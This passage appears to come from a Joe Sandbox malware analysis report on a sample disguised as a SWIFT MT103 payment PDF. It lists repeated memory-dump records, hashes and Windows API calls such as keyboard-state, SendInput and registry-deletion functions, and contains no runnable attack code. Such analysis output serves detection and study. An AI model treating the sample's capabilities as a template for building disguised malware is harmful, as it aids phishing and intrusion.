                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                                        • API String ID: 2574300362-3261711971
                                                        • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                        • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                                                        • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                        • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                        • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                                                        • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                        • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                                                        APIs
                                                        • GetClientRect.USER32(?,?), ref: 00433724
                                                        • GetWindowRect.USER32(00000000,?), ref: 00433757
                                                        • GetClientRect.USER32(0000001D,?), ref: 004337AC
                                                        • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                                        • GetWindowRect.USER32(?,?), ref: 00433814
                                                        • ScreenToClient.USER32(?,?), ref: 00433842
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Rect$Client$Window$MetricsScreenSystem
                                                        • String ID:
                                                        • API String ID: 3220332590-0
                                                        • Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                        • Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
                                                        • Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                        • Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _malloc_wcslen$_strcat_wcscpy
                                                        • String ID:
                                                        • API String ID: 1612042205-0
                                                        • Opcode ID: 78bb8301f2df6b646c443b14ef546a234434f80c4aa875d1c48f95d517834440
                                                        • Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
                                                        • Opcode Fuzzy Hash: 78bb8301f2df6b646c443b14ef546a234434f80c4aa875d1c48f95d517834440
                                                        • Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
                                                        APIs
                                                        • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                                                        • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                                        • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                                        • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                                        • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                                        • SendInput.USER32 ref: 0044C6E2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$InputSend
                                                        • String ID:
                                                        • API String ID: 2221674350-0
                                                        • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                        • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                                        • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                        • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$_wcscat
                                                        • String ID:
                                                        • API String ID: 2037614760-0
                                                        • Opcode ID: c3d60132d03e6e9aaf992afd40c569c0f32bb020d8b31a6b424623dccafdf89e
                                                        • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                                                        • Opcode Fuzzy Hash: c3d60132d03e6e9aaf992afd40c569c0f32bb020d8b31a6b424623dccafdf89e
                                                        • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                                                        APIs
                                                        • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                                                        • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                        • ScreenToClient.USER32(?,?), ref: 00447C39
                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                        • EndPaint.USER32(?,?), ref: 00447CD1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                        • String ID:
                                                        • API String ID: 4189319755-0
                                                        • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                        • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                                                        • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                        • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                                                        • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                                                        • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                                                          • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                          • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                          • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                        • String ID:
                                                        • API String ID: 1726766782-0
                                                        • Opcode ID: cfb78fa515af7d065db038b45cd6de1f966bdcb9de424eb447315820ccac69ca
                                                        • Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
                                                        • Opcode Fuzzy Hash: cfb78fa515af7d065db038b45cd6de1f966bdcb9de424eb447315820ccac69ca
                                                        • Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
                                                        APIs
                                                        • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
                                                        • EnableWindow.USER32(?,00000000), ref: 0044111A
                                                        • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
                                                        • ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
                                                        • EnableWindow.USER32(?,00000001), ref: 004411B3
                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Window$Show$Enable$MessageSend
                                                        • String ID:
                                                        • API String ID: 642888154-0
                                                        • Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                        • Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
                                                        • Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                        • Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                                                        • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow$InvalidateRect
                                                        • String ID:
                                                        • API String ID: 1976402638-0
                                                        • Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                        • Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
                                                        • Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                        • Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 00442597
                                                          • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                                                        • GetDesktopWindow.USER32 ref: 004425BF
                                                        • GetWindowRect.USER32(00000000), ref: 004425C6
                                                        • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                                                          • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                        • GetCursorPos.USER32(?), ref: 00442624
                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                        • String ID:
                                                        • API String ID: 4137160315-0
                                                        • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                        • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                                                        • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                        • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
                                                        APIs
                                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                                                        • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                        • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                        • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Window$Enable$Show$MessageSend
                                                        • String ID:
                                                        • API String ID: 1871949834-0
                                                        • Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                        • Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
                                                        • Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                        • Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
                                                        APIs
                                                        • _memset.LIBCMT ref: 0044961A
                                                        • SendMessageW.USER32 ref: 0044964A
                                                          • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
                                                        • _wcslen.LIBCMT ref: 004496BA
                                                        • _wcslen.LIBCMT ref: 004496C7
                                                        • SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$_wcslen$_memset_wcspbrk
                                                        • String ID:
                                                        • API String ID: 1624073603-0
                                                        • Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                        • Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
                                                        • Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                        • Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                        • Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
                                                        • Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                        • Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
                                                        APIs
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
                                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                        • DeleteObject.GDI32(?), ref: 0045564E
                                                        • DeleteObject.GDI32(?), ref: 0045565C
                                                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: DestroyWindow$DeleteObject$IconMove
                                                        • String ID:
                                                        • API String ID: 1640429340-0
                                                        • Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                        • Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
                                                        • Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                        • Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __fileno__setmode$DebugOutputString_fprintf
                                                        • String ID:
                                                        • API String ID: 3354276064-0
                                                        • Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                        • Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
                                                        • Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                        • Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Destroy$DeleteMenuObject$IconWindow
                                                        • String ID:
                                                        • API String ID: 752480666-0
                                                        • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                        • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                                                        • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                        • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                                                        APIs
